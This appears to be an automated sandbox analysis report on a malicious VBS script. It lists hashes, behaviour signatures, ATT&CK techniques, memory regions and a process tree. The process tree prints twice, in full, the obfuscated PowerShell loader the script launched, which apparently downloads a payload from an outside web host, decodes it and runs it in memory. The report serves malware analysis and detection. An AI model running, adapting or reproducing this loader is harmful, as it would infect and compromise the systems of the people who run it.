Resubmissions

23-02-2024 03:45

240223-ea6qpsaf9t 10

23-02-2024 02:03

240223-cg4htahg5x 10

Analysis

  • max time kernel
    137s
  • max time network
    163s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240221-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240221-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-02-2024 02:03

General

  • Target

    00decd06732fecef7a4c6db953d90a9fc76b9ad9ed2b8e183a07a365c45254c0.vbs

  • Size

    9KB

  • MD5

    d2a2d34acb027afc3b36960d398a909f

  • SHA1

    60c7adcd3ca1831961635409e1ede4c7a088c105

  • SHA256

    00decd06732fecef7a4c6db953d90a9fc76b9ad9ed2b8e183a07a365c45254c0

  • SHA512

    2ae8d75ac7d37716c8ae6a56043011490c8d60270056f8b55ed7048d996c90c0155572fd22d8a7f96de9760a200e24886a3c27265cedc0ffd4fe670c97eb0934

  • SSDEEP

    192:JtzOv8hyM8vUkovNuW2UOLoP8wb4+bgvp9IaNWXNkYpN:vKv8MJvtoVuWdOy8wZgvQaNWXNkc

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\00decd06732fecef7a4c6db953d90a9fc76b9ad9ed2b8e183a07a365c45254c0.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1516
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Pendr='Jolters:\Opno164';Set-Content $Pendr 'factoria';$rangdoo=Test-Path $Pendr;if($rangdoo){exit};function Knudesa9 ($antirac){For($Cele=4; $Cele -lt $antirac.Length-1; $Cele+=5){$Skelstnin=$Skelstnin+$antirac.'Substring'($Cele, 1)};$Skelstnin;}$Electrofi=Knudesa9 'PhanhNorttParatPriepFord:Manu/Spot/Zoopr Airo TilwdragtJacoeHviscJoachWagweKamfqsprnuCatai Korp RavmentieSupenColot Caus For.KildcEpizopeppmKabe/BrisiDownzAuto/StunCSkisoOutclUncomStonatoplnTiloh Rap.SalapKetufNummbAjos ';$Skelstnin01=Knudesa9 'IndtiBrane GgexKart ';$Pectosa = Knudesa9 'Over\HyppsAucayHovesBlkhwMangoInnewTrus6Trik4Dead\AlmeWrivniBradn FamdStrioAlanwCostsBookPGeneoEgolwKopie SigrSbesSRdehhTalieHemelLabolSneu\ BirvTabe1Prov.Perc0 Rig\RamepCritoLegew Sone UdmrdisksNsevhMixueVindlEkspl Are.KlereRemix BofeTrav ';&($Skelstnin01) (Knudesa9 'Tran$ MooJPletoTherlgroutedmoeIagtrIslasAcal2 afl=Over$Bloke ErhnAdelvEffe:SikkwFiduiGhennSkeldCycliDecorStan ') ;&($Skelstnin01) (Knudesa9 'Odes$TepePPraee dkscIntetCento ComspapiaKred=Symb$FletJFiduoZooplLizatVideeKongrNeddsBiml2Syva+Myco$HoriPSluteBlehc MustSandoAnfrsBreda Spl ') ;&($Skelstnin01) (Knudesa9 'Free$InevPAulor Trui ShinKdebsCrimg Scoe Morm Staa Boh Subh= Ori hjre(Tven( TragJukew LufmFjlliForm AntiwVindiTrlanAbst3Hyst2Nomb_Realp ThirAfstoFibec KaseSkrisHapasOver Swal-StivF Bio IndtPLsgnrBebyoraglcChifeBaans Tyvs LsnI ThodUnde=Fred$Tegn{PerrPafveIForbDSali}Pphb)Hete. ChoCYearoEvenmSubmmBawlaSeisnProtd BruL SkuiLabenSleeeHerp) Jul Vaci-SeedsBanepFlsklCouliOvertEnve Tast[Krakc ConhNappaBkforPoor]Firm3Meca4Stea ');&($Skelstnin01) (Knudesa9 'Germ$TourNSprnoGurkn NytcArch Vert=Kino Road$PoliPSayor HemiFejlnJerns StagSpeceThiemAcriaOper[Stat$ EncPPassr CraitaalndetesPrlugnyskeMotimRetraKont. AkrcPyraoSlugu KonnBrentKred-Indu2Biha] Rib ');&($Skelstnin01) (Knudesa9 'Nati$MastT OvevStara Unan Vergresbs ForfSoluj TrketarirAntr= Rad(StyrTRobee TersFasct Spi-DracPGummaecontudsah Abs erhe$ OvePmodseRettcsolatfaktoIndss Skiabypr)Skra Cock-FljtAMaggnLookdMaka Snke(Deli[KridITiinnStretSubdPMusitagerrFors]Slak:Hebr:TribsParaiMdrezDatae Slg Impr-Licieborgqnonp Stra8Haar) Ilk ') ;if ($Tvangsfjer) {&$Pectosa $Nonc;} else {;$Skelstnin00=Knudesa9 'IncoSIrnat BloaLagerAndet Udv-StryBUndeiFlagt OphsStevTFranrEleca EllnBiotsPitcfBenge SamrIndw Oate-VallS TngoSealuFedtrTvancMandeadyn Mili$SeksEGastlGonyeAtomcMilltAfkrrNoncoHivef Undi Fri Kak-HyleDdagte RotsfremtmassiSlvrn ThyaAntit KulinonaoVoyenDisp Tryk$JaloJGlyoo PnelCholttremeIdolrSprisBade2jess ';&($Skelstnin01) (Knudesa9 'Udea$SubdJLufto KnylThratSolseHavfrSydvs Hjl2Kare=Ligk$AntheRefenForvvAnil:autoaPylopSofap AfhdChonaRiset ForaPlot ') ;&($Skelstnin01) (Knudesa9 'AsceISeermFletpMoraoVeder Pret Exo-HerrM PeroArred husuAmorlHjere Oop PhysB SagiunsmtPamfsPresT MejrUnreaUdsmnKopisDefif vove FinrSymb ') ;$Jolters2=$Jolters2+'\Wheelhous.Spu';while (-not $Foxwoo) {&($Skelstnin01) (Knudesa9 'Aust$ nutF OutoKernxNatuw EyeoInteoRive=Klyn( UnsTAutoeLustsStegtWien-AtalPUrawa BeltReinhUnev Dip$IndeJunsloAbbelGenftKaryeUnferLeves Ret2Adam)Bagt ') ;&($Skelstnin01) $Skelstnin00;&($Skelstnin01) (Knudesa9 'RentSMetat Pana MerrUddatHjor-BillSKjeslPetre CapeDiffpFilm Misk5Udkm ');}&($Skelstnin01) (Knudesa9 'Halv$UnemKAkkonModeuIndhd FlueGalgsHeliaPilc Afhn=Ggek decGcatae LuftBoce-SammCStorooutwnSupetSurneVidenTipbtYtri Char$IsolJCamboPedilPoletMaese Rinr jossSwin2Mass ');&($Skelstnin01) (Knudesa9 ' Pre$IwarEPlymxRecotpseurHmsk Fiel=Insa Elli[ AriSUdeay fups StdtForbePetimVels.HarmCYdero DevnBuffv RemeSynor anstTeth]Vkst:Capo: eleFRebar PaloSubem ResBSeiraLegisDomse Uds6Over4GumpSEjentFellrOveriUnpunNdveg Lib(None$tappKSyndnTurcuAngldAnsveVings BesaPing)bord ');&($Skelstnin01) (Knudesa9 'Plex$HvidSMellkBogreSovjl SkrsBredtHavenAniliSatunImpl2Supe Acco=Besl Klor[HamsSNoneyBanasSynatUnoveStewmVare. SynTAmareDechxThertCouc.NarkESnusnBegycReatoNavidThrei GalnHeatgPakh]Klok:Felt:JordAConnSFebeC SkoIPlanIfras.WharGTindeHoratcercSPaputInver PaciRvesnSlidg For(Alas$KenoEtoffxLenit GrorUnde)Unde ');&($Skelstnin01) (Knudesa9 ' enc$CancCCulvrKontiPleicRancoPuniaBeldr Bluy brutOrieeHolb=Vory$MyriSVitakteraeGarilEndesRntgtOrphnInseiAssynEnto2Bevi.Slngs PrauResobTejss FrstFordrWholiOvernWeedgRegl( Pil3Agte2Inkl7Brem4 unf7 Com9 jvn,Kegl2 Aso8Smyk5Isin1Pere8Soph)Hers ');&($Skelstnin01) $Cricoaryte;}"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2312
      • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Pendr='Jolters:\Opno164';Set-Content $Pendr 'factoria';$rangdoo=Test-Path $Pendr;if($rangdoo){exit};function Knudesa9 ($antirac){For($Cele=4; $Cele -lt $antirac.Length-1; $Cele+=5){$Skelstnin=$Skelstnin+$antirac.'Substring'($Cele, 1)};$Skelstnin;}$Electrofi=Knudesa9 'PhanhNorttParatPriepFord:Manu/Spot/Zoopr Airo TilwdragtJacoeHviscJoachWagweKamfqsprnuCatai Korp RavmentieSupenColot Caus For.KildcEpizopeppmKabe/BrisiDownzAuto/StunCSkisoOutclUncomStonatoplnTiloh Rap.SalapKetufNummbAjos ';$Skelstnin01=Knudesa9 'IndtiBrane GgexKart ';$Pectosa = Knudesa9 'Over\HyppsAucayHovesBlkhwMangoInnewTrus6Trik4Dead\AlmeWrivniBradn FamdStrioAlanwCostsBookPGeneoEgolwKopie SigrSbesSRdehhTalieHemelLabolSneu\ BirvTabe1Prov.Perc0 Rig\RamepCritoLegew Sone UdmrdisksNsevhMixueVindlEkspl Are.KlereRemix BofeTrav ';&($Skelstnin01) (Knudesa9 'Tran$ MooJPletoTherlgroutedmoeIagtrIslasAcal2 afl=Over$Bloke ErhnAdelvEffe:SikkwFiduiGhennSkeldCycliDecorStan ') ;&($Skelstnin01) (Knudesa9 'Odes$TepePPraee dkscIntetCento ComspapiaKred=Symb$FletJFiduoZooplLizatVideeKongrNeddsBiml2Syva+Myco$HoriPSluteBlehc MustSandoAnfrsBreda Spl ') ;&($Skelstnin01) (Knudesa9 'Free$InevPAulor Trui ShinKdebsCrimg Scoe Morm Staa Boh Subh= Ori hjre(Tven( TragJukew LufmFjlliForm AntiwVindiTrlanAbst3Hyst2Nomb_Realp ThirAfstoFibec KaseSkrisHapasOver Swal-StivF Bio IndtPLsgnrBebyoraglcChifeBaans Tyvs LsnI ThodUnde=Fred$Tegn{PerrPafveIForbDSali}Pphb)Hete. ChoCYearoEvenmSubmmBawlaSeisnProtd BruL SkuiLabenSleeeHerp) Jul Vaci-SeedsBanepFlsklCouliOvertEnve Tast[Krakc ConhNappaBkforPoor]Firm3Meca4Stea ');&($Skelstnin01) (Knudesa9 'Germ$TourNSprnoGurkn NytcArch Vert=Kino Road$PoliPSayor HemiFejlnJerns StagSpeceThiemAcriaOper[Stat$ EncPPassr CraitaalndetesPrlugnyskeMotimRetraKont. AkrcPyraoSlugu KonnBrentKred-Indu2Biha] Rib ');&($Skelstnin01) (Knudesa9 'Nati$MastT OvevStara Unan Vergresbs ForfSoluj TrketarirAntr= Rad(StyrTRobee TersFasct Spi-DracPGummaecontudsah Abs erhe$ OvePmodseRettcsolatfaktoIndss Skiabypr)Skra Cock-FljtAMaggnLookdMaka Snke(Deli[KridITiinnStretSubdPMusitagerrFors]Slak:Hebr:TribsParaiMdrezDatae Slg Impr-Licieborgqnonp Stra8Haar) Ilk ') ;if ($Tvangsfjer) {&$Pectosa $Nonc;} else {;$Skelstnin00=Knudesa9 'IncoSIrnat BloaLagerAndet Udv-StryBUndeiFlagt OphsStevTFranrEleca EllnBiotsPitcfBenge SamrIndw Oate-VallS TngoSealuFedtrTvancMandeadyn Mili$SeksEGastlGonyeAtomcMilltAfkrrNoncoHivef Undi Fri Kak-HyleDdagte RotsfremtmassiSlvrn ThyaAntit KulinonaoVoyenDisp Tryk$JaloJGlyoo PnelCholttremeIdolrSprisBade2jess ';&($Skelstnin01) (Knudesa9 'Udea$SubdJLufto KnylThratSolseHavfrSydvs Hjl2Kare=Ligk$AntheRefenForvvAnil:autoaPylopSofap AfhdChonaRiset ForaPlot ') ;&($Skelstnin01) (Knudesa9 'AsceISeermFletpMoraoVeder Pret Exo-HerrM PeroArred husuAmorlHjere Oop PhysB SagiunsmtPamfsPresT MejrUnreaUdsmnKopisDefif vove FinrSymb ') ;$Jolters2=$Jolters2+'\Wheelhous.Spu';while (-not $Foxwoo) {&($Skelstnin01) (Knudesa9 'Aust$ nutF OutoKernxNatuw EyeoInteoRive=Klyn( UnsTAutoeLustsStegtWien-AtalPUrawa BeltReinhUnev Dip$IndeJunsloAbbelGenftKaryeUnferLeves Ret2Adam)Bagt ') ;&($Skelstnin01) $Skelstnin00;&($Skelstnin01) (Knudesa9 'RentSMetat Pana MerrUddatHjor-BillSKjeslPetre CapeDiffpFilm Misk5Udkm ');}&($Skelstnin01) (Knudesa9 'Halv$UnemKAkkonModeuIndhd FlueGalgsHeliaPilc Afhn=Ggek decGcatae LuftBoce-SammCStorooutwnSupetSurneVidenTipbtYtri Char$IsolJCamboPedilPoletMaese Rinr jossSwin2Mass ');&($Skelstnin01) (Knudesa9 ' Pre$IwarEPlymxRecotpseurHmsk Fiel=Insa Elli[ AriSUdeay fups StdtForbePetimVels.HarmCYdero DevnBuffv RemeSynor anstTeth]Vkst:Capo: eleFRebar PaloSubem ResBSeiraLegisDomse Uds6Over4GumpSEjentFellrOveriUnpunNdveg Lib(None$tappKSyndnTurcuAngldAnsveVings BesaPing)bord ');&($Skelstnin01) (Knudesa9 'Plex$HvidSMellkBogreSovjl SkrsBredtHavenAniliSatunImpl2Supe Acco=Besl Klor[HamsSNoneyBanasSynatUnoveStewmVare. SynTAmareDechxThertCouc.NarkESnusnBegycReatoNavidThrei GalnHeatgPakh]Klok:Felt:JordAConnSFebeC SkoIPlanIfras.WharGTindeHoratcercSPaputInver PaciRvesnSlidg For(Alas$KenoEtoffxLenit GrorUnde)Unde ');&($Skelstnin01) (Knudesa9 ' enc$CancCCulvrKontiPleicRancoPuniaBeldr Bluy brutOrieeHolb=Vory$MyriSVitakteraeGarilEndesRntgtOrphnInseiAssynEnto2Bevi.Slngs PrauResobTejss FrstFordrWholiOvernWeedgRegl( Pil3Agte2Inkl7Brem4 unf7 Com9 jvn,Kegl2 Aso8Smyk5Isin1Pere8Soph)Hers ');&($Skelstnin01) $Cricoaryte;}"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1644
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1644 -s 2096
          4⤵
          • Program crash
          PID:1172
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1644 -ip 1644
    1⤵
      PID:2688

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Discovery

    Query Registry

    1
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2fmwqlla.osc.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/1644-20-0x0000000005EB0000-0x0000000005F16000-memory.dmp
      Filesize

      408KB

    • memory/1644-39-0x0000000007CA0000-0x0000000007CB4000-memory.dmp
      Filesize

      80KB

    • memory/1644-19-0x0000000005E40000-0x0000000005EA6000-memory.dmp
      Filesize

      408KB

    • memory/1644-40-0x0000000074C30000-0x00000000753E0000-memory.dmp
      Filesize

      7.7MB

    • memory/1644-38-0x0000000007C10000-0x0000000007C32000-memory.dmp
      Filesize

      136KB

    • memory/1644-14-0x0000000002D00000-0x0000000002D36000-memory.dmp
      Filesize

      216KB

    • memory/1644-15-0x0000000074C30000-0x00000000753E0000-memory.dmp
      Filesize

      7.7MB

    • memory/1644-16-0x0000000002D90000-0x0000000002DA0000-memory.dmp
      Filesize

      64KB

    • memory/1644-17-0x0000000005720000-0x0000000005D48000-memory.dmp
      Filesize

      6.2MB

    • memory/1644-18-0x0000000005DA0000-0x0000000005DC2000-memory.dmp
      Filesize

      136KB

    • memory/1644-37-0x0000000008AD0000-0x000000000914A000-memory.dmp
      Filesize

      6.5MB

    • memory/1644-36-0x0000000007EA0000-0x0000000008444000-memory.dmp
      Filesize

      5.6MB

    • memory/1644-32-0x0000000006660000-0x00000000066AC000-memory.dmp
      Filesize

      304KB

    • memory/1644-31-0x0000000006630000-0x000000000664E000-memory.dmp
      Filesize

      120KB

    • memory/1644-30-0x0000000005FE0000-0x0000000006334000-memory.dmp
      Filesize

      3.3MB

    • memory/1644-33-0x00000000075D0000-0x0000000007666000-memory.dmp
      Filesize

      600KB

    • memory/1644-34-0x0000000006B50000-0x0000000006B6A000-memory.dmp
      Filesize

      104KB

    • memory/1644-35-0x0000000006BA0000-0x0000000006BC2000-memory.dmp
      Filesize

      136KB

    • memory/2312-10-0x00007FFADD2B0000-0x00007FFADDD71000-memory.dmp
      Filesize

      10.8MB

    • memory/2312-43-0x00007FFADD2B0000-0x00007FFADDD71000-memory.dmp
      Filesize

      10.8MB

    • memory/2312-13-0x000001D65D350000-0x000001D65D360000-memory.dmp
      Filesize

      64KB

    • memory/2312-5-0x000001D677A30000-0x000001D677A52000-memory.dmp
      Filesize

      136KB

    • memory/2312-11-0x000001D65D350000-0x000001D65D360000-memory.dmp
      Filesize

      64KB

    • memory/2312-12-0x000001D65D350000-0x000001D65D360000-memory.dmp
      Filesize

      64KB